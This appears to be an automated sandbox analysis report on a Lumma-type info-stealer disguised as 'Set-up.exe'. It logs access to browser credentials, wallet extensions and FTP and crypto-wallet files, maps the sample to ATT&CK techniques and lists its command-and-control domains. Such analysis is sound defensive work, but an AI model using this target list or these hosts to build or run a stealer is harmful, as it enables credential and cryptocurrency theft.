              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 'Set-up.exe PID: 3940, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: 'Set-up.exe PID: 3940, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              221
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information
              LSASS Memory21
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol41
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584523 Sample: 'Set-up.exe Startdate: 05/01/2025 Architecture: WINDOWS Score: 100 10 passhudmrue.click 2->10 14 Suricata IDS alerts for network traffic 2->14 16 Found malware configuration 2->16 18 Malicious sample detected (through community Yara rule) 2->18 20 6 other signatures 2->20 6 'Set-up.exe 2->6         started        signatures3 process4 dnsIp5 12 passhudmrue.click 172.67.178.174, 443, 49769, 49778 CLOUDFLARENETUS United States 6->12 22 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 6->22 24 Query firmware table information (likely to detect VMs) 6->24 26 Found many strings related to Crypto-Wallets (likely being stolen) 6->26 28 4 other signatures 6->28 signatures6

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              'Set-up.exe19%VirustotalBrowse
              'Set-up.exe18%ReversingLabsWin32.Ransomware.LummaCStealer
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://passhudmrue.click/rx0%Avira URL Cloudsafe
              http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar0%Avira URL Cloudsafe
              https://passhudmrue.click:443/api0%Avira URL Cloudsafe
              https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc=0%Avira URL Cloudsafe
              https://passhudmrue.click/api0%Avira URL Cloudsafe
              https://passhudmrue.click/api?l/h0%Avira URL Cloudsafe
              https://vivporn.com/wp-content/plugins/0%Avira URL Cloudsafe
              https://passhudmrue.click/t0%Avira URL Cloudsafe
              https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.com0%Avira URL Cloudsafe
              https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=%0%Avira URL Cloudsafe
              https://passhudmrue.click/apis0%Avira URL Cloudsafe
              https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&em0%Avira URL Cloudsafe
              https://passhudmrue.click/api9T)0%Avira URL Cloudsafe
              https://passhudmrue.click/c0%Avira URL Cloudsafe
              https://www.tomabo.com/mp4-player/download.html0%Avira URL Cloudsafe
              https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.c0%Avira URL Cloudsafe
              https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofile0%Avira URL Cloudsafe
              passhudmrue.click0%Avira URL Cloudsafe
              https://passhudmrue.click/e0%Avira URL Cloudsafe
              https://passhudmrue.click/apiQ.0%Avira URL Cloudsafe
              https://passhudmrue.click/0%Avira URL Cloudsafe
              https://www.hotmovs.com/0%Avira URL Cloudsafe
              https://passhudmrue.click/apiNp0%Avira URL Cloudsafe
              https://www.tomabo.com/videos/dog-and-balls.mp4Please0%Avira URL Cloudsafe
              https://passhudmrue.click/440%Avira URL Cloudsafe
              https://passhudmrue.click/apihF)0%Avira URL Cloudsafe
              https://passhudmrue.click/00%Avira URL Cloudsafe
              https://passhudmrue.click/N0%Avira URL Cloudsafe
              https://passhudmrue.click/R0%Avira URL Cloudsafe
              https://www.tomabo.comVersion0%Avira URL Cloudsafe

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              passhudmrue.click
              172.67.178.174
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://passhudmrue.click/apitrue
                • Avira URL Cloud: safe
                unknown
                passhudmrue.clicktrue
                • Avira URL Cloud: safe
                unknown
                rabidcowse.shopfalse
                  high
                  wholersorie.shopfalse
                    high
                    cloudewahsj.shopfalse
                      high
                      noisycuttej.shopfalse
                        high
                        nearycrepso.shopfalse
                          high
                          framekgirus.shopfalse
                            high
                            tirepublicerj.shopfalse
                              high
                              abruptyopsn.shopfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtab'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q='Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.redtube.com/videohttps://www.thumbzilla.com/Thumbzillathumbzilla.comthumbzilla.'Set-up.exefalse
                                      high
                                      http://crl.microsoft'Set-up.exe, 00000000.00000003.2430771880.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458966002.0000000000985000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457690210.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2434892748.0000000000947000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457833420.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=%'Set-up.exefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.com'Set-up.exefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://passhudmrue.click:443/api'Set-up.exe, 00000000.00000003.2439840197.00000000009A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.yahoo.com/Yahoo'Set-up.exefalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command='Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.youtube.com/%I64d-%I64d-%I64d0-%I64dContent-Type:'Set-up.exefalse
                                              high
                                              https://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPlease'Set-up.exefalse
                                                high
                                                http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar'Set-up.exefalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://ocsp.starfieldtech.com/0D'Set-up.exefalse
                                                  high
                                                  https://www.txxx.com/'Set-up.exefalse
                                                    high
                                                    https://passhudmrue.click/rx'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc='Set-up.exefalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0'Set-up.exefalse
                                                      high
                                                      http://x1.c.lencr.org/0'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://x1.i.lencr.org/0'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.eporner.com/EPORNEReporner.comeporner.cdn.eporner.comhttps://www.eporner.com/video-%s//&'Set-up.exefalse
                                                              high
                                                              https://vivporn.com/wp-content/plugins/'Set-up.exefalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://passhudmrue.click/t'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://passhudmrue.click/api?l/h'Set-up.exe, 00000000.00000003.2434892748.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://passhudmrue.click/api9T)'Set-up.exe, 00000000.00000003.2434822982.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457889124.000000000374B000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2439659352.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2459592358.000000000374D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://passhudmrue.click/apis'Set-up.exe, 00000000.00000003.2419112504.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419283872.000000000374B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://crl.starfieldtech.com/repository/sfsroot.crl0P'Set-up.exefalse
                                                                high
                                                                https://www.tomabo.com/mp4-player/download.html'Set-up.exefalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://support.mozilla.org/products/firefoxgro.all'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofile'Set-up.exefalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.mozilla.or'Set-up.exe, 00000000.00000003.2388398991.000000000377D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&em'Set-up.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://passhudmrue.click/c'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.c'Set-up.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://passhudmrue.click/e'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://ocsp.thawte.com0'Set-up.exefalse
                                                                        high
                                                                        https://passhudmrue.click/apiQ.'Set-up.exe, 00000000.00000003.2301498819.000000000374D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.youtube.com/playlist?list=%shttps://i.ytimg.com/vi/%s/maxresdefault.jpghttps://i.ytimg.c'Set-up.exefalse
                                                                          high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q='Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://passhudmrue.click/'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419615846.000000000092E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://passhudmrue.click/R'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://ocsp.rootca1.amazontrust.com0:'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://certificates.starfieldtech.com/repository/1604'Set-up.exefalse
                                                                                  high
                                                                                  https://www.ecosia.org/newtab/'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.youtube.com/youtubei/v1/player?key=%s&prettyPrint=falseOriginX-Youtube-Client-VersionX-Y'Set-up.exefalse
                                                                                      high
                                                                                      http://www.symauth.com/cps0('Set-up.exefalse
                                                                                        high
